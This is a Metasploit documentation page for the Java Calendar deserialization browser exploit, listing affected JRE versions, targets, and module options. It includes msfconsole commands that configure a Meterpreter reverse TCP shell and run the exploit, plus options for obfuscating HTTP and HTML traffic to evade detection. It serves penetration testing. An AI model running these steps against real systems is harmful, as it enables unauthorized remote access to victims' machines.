Metasploit Penetration Testing Framework
Sun Java Calendar Deserialization Exploit
This module exploits a flaw in the deserialization of Calendar objects in the Sun JVM. The payload can be either a native payload which is generated as an executable and dropped/executed on the target or a shell from within the Java applet in the target browser. The affected Java versions are JDK and JRE 6 Update 10 and earlier, JDK and JRE 5.0 Update 16 and earlier, SDK and JRE 1.4.2_18 and earlier (SDK and JRE 1.3.1 are not affected).
Rank
Authors
- sf < stephen_fewer [at] harmonysecurity.com >
- hdm < hdm [at] metasploit.com >
References
Exploit Targets
- 0 - Generic (Java Payload) (default)
- 1 - Windows x86 (Native Payload)
- 2 - Mac OS X PPC (Native Payload)
- 3 - Mac OS X x86 (Native Payload)
- 4 - Linux x86 (Native Payload)
Development
Similar Modules
Usage Information
$ msfconsole
## ### ## ##
## ## #### ###### #### ##### ##### ## #### ######
####### ## ## ## ## ## ## ## ## ## ## ### ##
####### ###### ## ##### #### ## ## ## ## ## ## ##
## # ## ## ## ## ## ## ##### ## ## ## ## ##
## ## #### ### ##### ##### ## #### #### #### ###
##
msf > use exploit/multi/browser/java_calendar_deserialize
msf exploit(java_calendar_deserialize) > show payloads
msf exploit(java_calendar_deserialize) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(java_calendar_deserialize) > set LHOST [MY IP ADDRESS]
msf exploit(java_calendar_deserialize) > exploit
Module Options
| SRVHOST |
The local host to listen on. (default: 0.0.0.0) |
| SRVPORT |
The local port to listen on. (default: 8080) |
| SSL |
Negotiate SSL for incoming connections |
| SSLVersion |
Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1) (default: SSL3) |
| URIPATH |
The URI to use for this exploit (default is random) |
| ContextInformationFile |
The information file that contains context information |
| DisablePayloadHandler |
Disable the handler code for the selected payload |
| EnableContextEncoding |
Use transient context when encoding payloads |
| WORKSPACE |
Specify the workspace for this module |
| HTML::base64 |
Enable HTML obfuscation via an embeded base64 html object (accepted: none, plain, single_pad, double_pad, random_space_injection) |
| HTML::javascript::escape |
Enable HTML obfuscation via HTML escaping (number of iterations) |
| HTML::unicode |
Enable HTTP obfuscation via unicode (accepted: none, utf-16le, utf-16be, utf-16be-marker, utf-32le, utf-32be) |
| HTTP::chunked |
Enable chunking of HTTP responses via "Transfer-Encoding: chunked" |
| HTTP::compression |
Enable compression of HTTP responses via content encoding (accepted: none, gzip, deflate) |
| HTTP::header_folding |
Enable folding of HTTP headers |
| HTTP::junk_headers |
Enable insertion of random junk HTTP headers |
| TCP::max_send_size |
Maximum tcp segment size. (0 = disable) |
| TCP::send_delay |
Delays inserted before every send. (0 = disable) |